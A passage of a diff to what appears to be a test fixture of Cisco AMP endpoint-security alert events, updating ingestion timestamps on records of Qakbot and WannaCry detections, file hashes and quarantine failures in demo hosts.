Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -4364,7 +4364,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764178800Z", + "ingested": "2021-12-14T14:40:45.520877670Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -4440,7 +4440,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764184200Z", + "ingested": "2021-12-14T14:40:45.520878103Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -4516,7 +4516,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764190200Z", + "ingested": "2021-12-14T14:40:45.520878647Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -4598,7 +4598,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764196200Z", + "ingested": "2021-12-14T14:40:45.520879048Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", @@ -4678,7 +4678,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764201Z", + "ingested": "2021-12-14T14:40:45.520879444Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", @@ -4758,7 +4758,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764222200Z", + "ingested": "2021-12-14T14:40:45.520879833Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", @@ -4832,7 +4832,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764226200Z", + "ingested": "2021-12-14T14:40:45.520880228Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -4929,7 +4929,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764254100Z", + "ingested": "2021-12-14T14:40:45.520880675Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -5032,7 +5032,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764345400Z", + "ingested": "2021-12-14T14:40:45.520881076Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -5110,7 +5110,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764350700Z", + "ingested": "2021-12-14T14:40:45.520881486Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -5182,7 +5182,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764356Z", + "ingested": "2021-12-14T14:40:45.520881891Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", @@ -5258,7 +5258,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764377900Z", + "ingested": "2021-12-14T14:40:45.520882284Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", @@ -5334,7 +5334,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764381800Z", + "ingested": "2021-12-14T14:40:45.520882789Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648155", "kind": "alert", @@ -5412,7 +5412,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764387200Z", + "ingested": "2021-12-14T14:40:45.520883282Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", @@ -5492,7 +5492,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764393100Z", + "ingested": "2021-12-14T14:40:45.520883738Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", @@ -5576,7 +5576,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764398700Z", + "ingested": "2021-12-14T14:40:45.520884149Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "code": "553648147", "kind": "alert", @@ -5650,7 +5650,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764405100Z", + "ingested": "2021-12-14T14:40:45.520884898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 